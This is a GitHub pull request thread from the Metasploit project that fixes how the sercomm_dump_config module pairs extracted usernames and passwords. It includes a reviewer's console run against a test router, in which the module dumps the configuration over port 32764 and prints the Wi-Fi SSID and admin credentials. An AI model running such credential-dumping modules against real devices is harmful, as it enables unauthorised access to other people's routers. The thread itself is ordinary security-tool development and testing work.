Fixed the credential parsing and made output consistent #2878

Merged
merged 2 commits into from Jan 16, 2014

Projects

None yet

3 participants

@mandreko
Contributor

So in the previous refactor, we made the dedicated method to parse
usernames and passwords from the split up config values. However, that
didn't work, because on a single iteration of the loop, you only have
access to a possible username OR password. The other matching key will
be another iteration of the loop. Because of this, no credential pairs
were being reported.

The only way I can see around this (maybe because I'm a ruby newb) would
be to iterate over configs, and if the user or password regex matches,
add the matching value to a hash, which is identified by a key for both
user & pass. Then upon completion of the loop, it'd iterate over the
hash, finding keys that had both user & pass values.

mandreko added some commits Jan 14, 2014
@mandreko mandreko Fixed the credential parsing and made output consistent
So in the previous refactor, we made the dedicated method to parse
usernames and passwords from the split up config values. However, that
didn't work, because on a single iteration of the loop, you only have
access to a possible username OR password. The other matching key will
be another iteration of the loop. Because of this, no credential pairs
were being reported.

The only way I can see around this (maybe because I'm a ruby newb) would
be to iterate over configs, and if the user or password regex matches,
add the matching value to a hash, which is identified by a key for both
user & pass. Then upon completion of the loop, it'd iterate over the
hash, finding keys that had both user & pass values.
42fb8c4
@mandreko mandreko Added some additional creds that were useful 2d40f93
@jvazquez-r7
Contributor

Processing....

This was referenced Jan 14, 2014
@jvazquez-r7
Contributor

mandreko#3 tries to clean this pull request, see it for details, thanks!

@jvazquez-r7
Contributor

Hi @mandreko, we got a vulnerable device for testing, and I was able to check changes successfully :)

msf auxiliary(sercomm_dump_config) > show options

Module options (auxiliary/admin/misc/sercomm_dump_config):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  32764            yes       The target port

msf auxiliary(sercomm_dump_config) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf auxiliary(sercomm_dump_config) > run

[*] 192.168.0.1:32764 - Attempting to connect and check endianess...
[+] 192.168.0.1:32764 - Big Endian device found...
[*] 192.168.0.1:32764 - Attempting to connect and dump configuration...
[*] 192.168.0.1:32764 - Router configuration dump stored in: /Users/juan/.msf4/loot/20140116072256_default_192.168.0.1_router.config_791024.txt
[*] 192.168.0.1:32764 - Wifi SSID: NETGEAR51
[*] 192.168.0.1:32764 - HTTP Web Management: User: admin Pass: password
[*] Auxiliary module execution completed

So if you don't mind I'm going to land this pull request with my review included at the moment. If later you figure there is anything wrong with my changes, feel free to make new pull request or just ping me and we can fix! Landing! Thanks a lot for keep reviewing it, you rock!

juan

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2878, @mandreko's fix for sercomm credentials parsing 2e6b1c7
@jvazquez-r7 jvazquez-r7 merged commit 2d40f93 into rapid7:master Jan 16, 2014

1 check passed

default The Travis CI build passed
Details
@todb
Contributor
todb commented Jan 16, 2014

Oh great, i'm glad the device worked out!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment